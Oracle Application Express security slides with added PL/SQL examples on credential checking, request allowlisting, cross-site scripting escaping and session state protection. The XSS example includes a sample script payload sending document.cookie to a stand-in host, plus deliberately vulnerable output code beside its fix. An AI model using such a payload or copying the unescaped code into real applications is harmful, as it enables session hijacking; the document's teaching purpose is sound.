Oracle Application Express
Security
Authentication
• Out-of-the-Box Pre-Configured Schemes
• LDAP Directory credentials
• Oracle Application Server Single Sign-On
• Open Door credentials
• Application Express accounts
• Database Account credentials
• No Authentication (using DAD)
• Custom Authentication
• Customizable session management logic
• Use the built-in page sentry, or replace it with a custom session verification function
• Develop a custom sentry (examples provided)
• Credentials verification custom PL/SQL
• Accepts user name and password; Returns Boolean
• Only executed once per session
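The credentials verification function above is the piece a developer writes. As an added example (not code from the slides or from Oracle), here is one for a custom authentication scheme: it takes the user name and password APEX passes in and returns a BOOLEAN. The APP_USERS table, the names app_set_password and app_verify_password, and the execute privilege on DBMS_CRYPTO are assumptions of this example.

```plsql
-- Added example, not from the slides: a credentials verification function
-- for an APEX custom authentication scheme. APEX calls it with the
-- submitted user name and password and expects TRUE or FALSE back.
-- The APP_USERS table, the function/procedure names and the execute
-- privilege on DBMS_CRYPTO are assumptions of this example.
--
-- create table app_users (
--   username  varchar2(100) primary key,   -- stored upper-case
--   salt      raw(16)       not null,
--   pw_hash   raw(20)       not null,      -- SHA-1 of salt || password
--   is_locked varchar2(1)   default 'N' not null
-- );

-- Used by an administrator (or a self-service page) to set a password.
-- A fresh random salt per user means equal passwords give different hashes.
create or replace procedure app_set_password (
    p_username in varchar2,
    p_password in varchar2
)
is
    l_salt raw(16) := dbms_crypto.randombytes(16);
begin
    update app_users
       set salt    = l_salt,
           pw_hash = dbms_crypto.hash(
                         src => utl_raw.concat(l_salt,
                                               utl_raw.cast_to_raw(p_password)),
                         typ => dbms_crypto.hash_sh1)
     where username = upper(p_username);
end app_set_password;
/

create or replace function app_verify_password (
    p_username in varchar2,
    p_password in varchar2
) return boolean
is
    l_salt     app_users.salt%type;
    l_stored   app_users.pw_hash%type;
    l_locked   app_users.is_locked%type;
    l_computed raw(20);
begin
    -- Empty credentials never match; refuse before querying.
    if p_username is null or p_password is null then
        return false;
    end if;

    select salt, pw_hash, is_locked
      into l_salt, l_stored, l_locked
      from app_users
     where username = upper(p_username);

    if l_locked = 'Y' then
        return false;
    end if;

    -- Recompute the salted hash; the clear-text password is never stored
    -- and never compared directly.
    l_computed := dbms_crypto.hash(
                      src => utl_raw.concat(l_salt,
                                            utl_raw.cast_to_raw(p_password)),
                      typ => dbms_crypto.hash_sh1);

    -- utl_raw.compare returns 0 only when both RAWs are identical.
    return utl_raw.compare(l_computed, l_stored) = 0;
exception
    when no_data_found then
        -- Unknown user: same answer as a wrong password, so the login
        -- form does not reveal which user names exist.
        return false;
end app_verify_password;
/
```

The authentication scheme's credentials verification attribute then points at the function (in the 3.x wizard as `return app_verify_password;`). SHA-1 is the strongest digest DBMS_CRYPTO offered at the time of these slides; the structure of the check stays the same if a slower, iterated password hash is substituted.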
© 2009 Oracle Corporation
Managing User Access
• Authorization
• Pass / Fail checks – results cached to improve performance
• Can be associated with any component (e.g. application, page, button, validation, item, etc.)
• Various types (e.g. Exists, SQL Query, PL/SQL Function, etc.)
• Session State Protection
• Prevent URL Tampering
• Appends an MD5 checksum to protected URLs
• Database security features apply transparently
• Fine Grained Access Control (aka VPD); Transparent Data Encryption; Database Vault; Advanced Security Option; etc.
• No APEX development effort required
Administrator Best Practices
• Considerations with Embedded PL/SQL Gateway
• Uses the XML DB HTTP Protocol Listener, which is part of the database
• Not recommended for internet-facing applications
• Configuring Oracle HTTP Server with mod_plsql
• Configured using Database Access Descriptors (DADs)
• Use PlsqlRequestValidationFunction to allow only specified procedures to be called through the DAD
• Utilizing Secure Sockets Layer (SSL)
• Implemented using the HTTPS protocol – encrypts traffic in both directions
• Prevents credentials and data from crossing an unprotected communication channel
• APEX Runtime-Only Environment
• Scripts provided to completely remove / re-install Application Builder
• Removes Web interface for administration and application development
• Setting Password Complexity Rules
• Multiple complexity rules can be set and reused across the instance
• Using Session Timeout
• Set maximum session length and idle time for APEX developer log-ins
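The PlsqlRequestValidationFunction bullet under Configuring Oracle HTTP Server above is the one that stops arbitrary procedures in the DAD's schema from being invoked by URL. As an added example (not from the slides or from Oracle), here is an allowlist version of such a function for a DAD that serves a hand-written PL/SQL web application; the schema APP_WEB, the function and procedure names, the APP_REQUEST_DENIED audit table and the dads.conf fragment are assumptions of this example.

```plsql
-- Added example, not from the slides: an allowlist request validation
-- function for a mod_plsql DAD. mod_plsql calls it with the name of the
-- procedure a URL is asking for and runs that procedure only if the
-- function returns TRUE. The schema, function, procedure and table names
-- below are assumed for this example. APEX ships its own function
-- (wwv_flow_epg_include_modules.authorize) for its DADs; this is the
-- equivalent for a DAD that serves a hand-written PL/SQL web application.
--
-- dads.conf for that DAD (assumed location /pls/app):
--   <Location /pls/app>
--     SetHandler pls_handler
--     PlsqlDatabaseUsername          app_web
--     PlsqlRequestValidationFunction app_web.app_request_validation
--     ...
--   </Location>
--
-- Audit table for refused requests (assumed for this example):
-- create table app_request_denied (
--   denied_at      timestamp default systimestamp not null,
--   procedure_name varchar2(256)
-- );

create or replace function app_request_validation (
    procedure_name in varchar2
) return boolean
is
    l_name varchar2(256);

    procedure log_denied (p_name in varchar2) is
        pragma autonomous_transaction;
    begin
        -- Autonomous so the audit row survives whatever happens to the
        -- rejected request's own transaction.
        insert into app_request_denied (procedure_name)
        values (substr(p_name, 1, 256));
        commit;
    end log_denied;
begin
    -- Normalize defensively: compare case-insensitively and ignore a
    -- leading "!" (flexible parameter passing) if one is present.
    l_name := upper(ltrim(trim(procedure_name), '!'));

    -- Allowlist of the only entry points reachable over HTTP, with and
    -- without the schema qualifier. Everything else in APP_WEB, and
    -- anything in another schema, is refused, so utility packages or
    -- SYS-owned procedures cannot be reached just by naming them in a URL.
    if l_name in ('APP_WEB.HOME',
                  'APP_WEB.SEARCH',
                  'APP_WEB.DOWNLOAD_DOCUMENT',
                  'HOME',
                  'SEARCH',
                  'DOWNLOAD_DOCUMENT') then
        return true;
    end if;

    -- Denied: record the attempted name so probing shows up in the audit
    -- table, then tell mod_plsql not to run it.
    log_denied(l_name);
    return false;
end app_request_validation;
/
```

An allowlist is the right shape here: a deny-list of "dangerous" names has to anticipate every package the schema can see, whereas the allowlist only has to name the handful of entry points the application actually exposes.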
Developer Best Practices
• Understand Items of type Password
• Entered text is not echoed to the screen
• Should not save state, or should use Item encryption if the value is saved to the DB
• Reports provided to identify at-risk Password items
• Using Zero as Session ID
• Critical for PUBLIC applications to ensure no cross-user contamination of session state
• Session ID is not included in the application URL
• Cross-Site Scripting Protection
• Protect HTML Regions and other static areas
• Use &ITEM. notation to reference session state variables
• Select best Item types based on protection required
• Protect Dynamic Output
• Explicitly use escape code when emitting session state
e.g. htp.p(htf.escape_sc(v('SOME_ITEM')));
• Protect Report Regions
• References in headings and messages escaped based on Item type
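To make the "Protect Dynamic Output" bullet concrete, here is an added example (not from the slides) of a PL/SQL region source that echoes a search term the user entered, first as it is often written and then hardened with htf.escape_sc. The item names P1_SEARCH and P2_SEARCH, page 2, the region markup and the attacker payload are constructed for this example.

```plsql
-- Added example, not from the slides: a PL/SQL region source that echoes
-- a search term the user entered into page item P1_SEARCH, first the way
-- it is often written, then hardened as the slide recommends. The item
-- names, page number, region markup and sample payload are assumed.

-- Constructed attacker input, typed into P1_SEARCH on the previous page:
--   <script>document.location='http://evil.example/?c='+document.cookie</script>

-- VULNERABLE: session state is concatenated straight into the markup, so
-- the browser parses the payload as a script running in the application's
-- origin, with access to the session cookie.
begin
    htp.p('<h3>Results for "' || v('P1_SEARCH') || '"</h3>');
    htp.p('<a href="f?p=' || v('APP_ID') || ':2:' || v('APP_SESSION')
          || '::NO::P2_SEARCH:' || v('P1_SEARCH') || '">Refine search</a>');
end;

-- HARDENED: every session state value that reaches the page goes through
-- htf.escape_sc, which rewrites & < > " as &amp; &lt; &gt; &quot;.
-- The payload above now renders as literal text, e.g.
--   &lt;script&gt;document.location=...&lt;/script&gt;
-- The value placed in the href is URL-escaped first (utl_url.escape with
-- reserved characters escaped), because an attribute that is also a URL
-- needs URL escaping in addition to HTML escaping, in that order.
begin
    htp.p('<h3>Results for "' || htf.escape_sc(v('P1_SEARCH')) || '"</h3>');
    htp.p('<a href="f?p=' || v('APP_ID') || ':2:' || v('APP_SESSION')
          || '::NO::P2_SEARCH:'
          || htf.escape_sc(utl_url.escape(v('P1_SEARCH'), true))
          || '">Refine search</a>');
end;
```

The same rule applies to any other place session state is written into the page from code: escape at the point of output, for the context (HTML text, attribute, URL) the value is landing in.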
Developer Best Practices
• Session State Protection
• Clear session state of unneeded values using Clear Cache built-ins
• Enable Session State Protection to prevent URL tampering
• Set appropriate protection for Pages, Items and Application Items using built-ins
• Utilize Application Session Time-Outs
• Build a public page for users to land on when the session has expired
• Set Maximum Session Length and Maximum Session Idle times
• Save State before Branching
• Use Branch checkbox to save session state values prior to branching
• Session state values will not be displayed in the Branch URL
• Saving sensitive Item values (e.g. SSN)
• Use the Item checkbox to store the value encrypted in session state
• Values are then stored encrypted in the APEX session state table
• For sensitive data stored in the database, encrypt the table columns
• Encrypting table columns is completely independent of APEX
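As an added example (not from the slides or from Oracle), here are the built-ins behind the Session State Protection, Clear Cache and Save State before Branching bullets on this slide, plus the column encryption the last bullet places outside APEX. Application 100, pages 5 and 10, the items P5_ORDER_ID and P10_ORDER_ID and the ORDERS table are assumptions of this example.

```plsql
-- Added example, not from the slides: the built-ins behind session state
-- protection, clearing cache, saving state before a branch, and the column
-- encryption that sits outside APEX. Application 100, pages 5 and 10,
-- items P5_ORDER_ID / P10_ORDER_ID and table ORDERS are assumed.

-- 1. Session State Protection. With it enabled, page 10 set to
--    "Arguments must have checksum" and P10_ORDER_ID set to "Checksum
--    required", a URL typed by hand such as
--      f?p=100:10:1234567890::NO::P10_ORDER_ID:4712
--    is rejected by the engine. Links must be built by the engine so the
--    checksum covers the item values; apex_util.prepare_url appends it as
--    &cs=... to the URL it is given.
declare
    l_url varchar2(4000);
begin
    -- Position 6 (CLEARCACHE) clears page 10's old state before the new
    -- order id is set from the current page's item.
    l_url := apex_util.prepare_url(
                 p_url => 'f?p=' || v('APP_ID') || ':10:' || v('APP_SESSION')
                          || '::NO:10:P10_ORDER_ID:' || :P5_ORDER_ID);
    -- The prepared URL contains "&cs=", so escape it for the attribute.
    htp.p('<a href="' || htf.escape_sc(l_url) || '">Open order</a>');
end;

-- 2. Save State before Branching. Rather than carrying the value in the
--    branch URL, a page process that runs before the branch writes it to
--    session state and the branch goes to page 10 with nothing in the URL
--    to tamper with. (The Branch "save state" checkbox does this without
--    code; this is the equivalent in a process.)
begin
    apex_util.set_session_state('P10_ORDER_ID', :P5_ORDER_ID);
end;
-- Branch target: f?p=&APP_ID.:10:&SESSION.

-- 3. Clear session state of values no longer needed, e.g. in a process that
--    runs once the order is confirmed, so the id does not linger in the
--    session for later pages.
begin
    apex_util.clear_page_cache(10);
end;

-- 4. Independent of APEX: Transparent Data Encryption on the column that
--    holds the sensitive value, so it is encrypted at rest whichever
--    application writes it. Requires the Advanced Security Option and an
--    open wallet; the table and column are assumed.
alter table orders modify (card_number encrypt using 'AES256');
```

Items 1 to 3 are run inside an APEX session (region source or page processes), which is where v('APP_ID'), v('APP_SESSION') and the :P5_ORDER_ID bind are defined; item 4 is plain DDL run once by the DBA.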